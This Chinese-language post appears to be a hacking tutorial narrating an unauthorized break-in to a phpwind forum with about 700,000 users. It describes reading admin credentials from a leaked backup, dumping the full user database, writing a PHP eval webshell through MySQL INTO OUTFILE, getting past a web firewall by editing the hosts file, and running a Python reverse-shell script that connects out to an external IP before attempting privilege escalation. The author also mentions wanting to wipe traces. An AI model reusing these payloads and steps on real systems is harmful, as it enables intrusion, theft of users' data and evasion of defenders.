web检测+拿shell+Linux提权一条龙科普

摘要: 非常棒的一篇手记，心灵手巧的作者用自写的备份文件fuzz工具摸到了目标的备份，读取配置文件后一路高歌猛进，写webshell，反弹交互式会话提权

拿我写的“备份文件批量扫描器不外传”扫到了一个网站的备份文件（XDSEC内部测试使用，大家暂时不要找我要，不想因为一个工具影响交情，裤子也一样），phpwind8.7，用户有70来万，有使用了加速乐。向来对裤子感兴趣，于是想把它裤子脱下来。

下载下来以后，读到数据库的配置文件/data/sql_config.php，数据库地址是一个内网，192.168.10.12。

这时就想，如果是内网，那么应该不能连接其数据库。后来又翻配置文件，找到“创始人用户名数组”和“创始人密码数组”，没想到phpwind中管理员的密码保存在文件中。

解密以后登录后台。后台数据 – 数据库 – 数据维护，可以对所有表进行备份。但是备份的时候注意，数据库很大的时候一定要分卷备份。有些同学有强迫症喜欢备份成一个文件，就把分卷大小输入999999，导致最后备份备死掉。

一般10M一个卷就可以。

备份好以后下载，裤子就算脱完了。再观察后台，该修的都修了，应用中心无法上传，不能拿shell。

当时想，拿下shell连一下数据库把痕迹清理了。不过既然后台拿不到shell干脆再回到源码的地方，数据库是root权限，试试外连呗，结果一连就连上了。

看似很苛刻的，内网+加速乐，结果还是外连连上了。。。早知道不用进后台。

连上mysql，当时还是以为数据库在内网（其实后来发现就是本机，本机在内网的IP就是10.12），以为mysql里数据库比较多，没一个一个翻。想着写到shell就能解释疑惑了。

结果没有绝对路径……

看服务器的特征感觉是linux + apache，apache的如何找绝对路径。下面说一个小tip：

apache默认配置文件：/etc/httpd/conf/httpd.conf

默认虚拟主机配置文件：/etc/httpd/conf.d/vhost.conf

我们用mysql load_file，select load_file(‘/etc/httpd/conf/httpd.conf’)，如果navicat中读出来的内容是二进制BLOB的话，只用右键 – 保存数据为一个文件即可）读取这两个配置文件。httpd.conf中，有apache默认的www目录DocumentRoot：

但如果网站是以虚拟主机来运行的话，就再看看虚拟主机的配置文件，很多东西就一目了然了：

、

然后我们直接写shell：

select “<?php eval($_POST[f4ck]); ?>” into outfile “/data/root/*************/wwwroot/f4ck.php”;

菜刀连接发现被拦截了，因为有加速乐。当连接一句话的时候有加速乐或安全宝之类中介拦截的话，如果是独立IP，我们直接连接其IP即可，如果不是我们可以修改本地host文件，将域名直接指向IP，绕过中间的DNS。

在菜刀上执行命令，用户是apache，但尴尬的发现uname这个命令无法执行……在/proc/version文件中读读linux版本，却发现连cat命令也无法执行。

我试了一切读取文件的命令，head、tail、less、more等，都是permission denied：

最后只能把/proc/version拷贝到tmp目录下用菜刀查看：

cp /proc/version /tmp/version

2.6.18-194 el5，我们试试提权。先得弹一个shell回来，只有获得了交互型shell才能去提权，否则提下来我们也用不了。

先试试python，看看服务器是否支持：

OK，可以执行python。我们写一个python的反弹shell脚本：

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("156.11.210.88",11890))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

需要本地有外网IP，或你在另一台已经有权限的服务器上，用nc监听端口（nc.exe -l -p 11890）。其中156.11.210.88是你本地外网IP，11890是你本地监听的端口。

将其保存为/tmp/shell.py，执行python /tmp/shell.py即可。我们再来到查看本地nc，已经看到弹回了shell：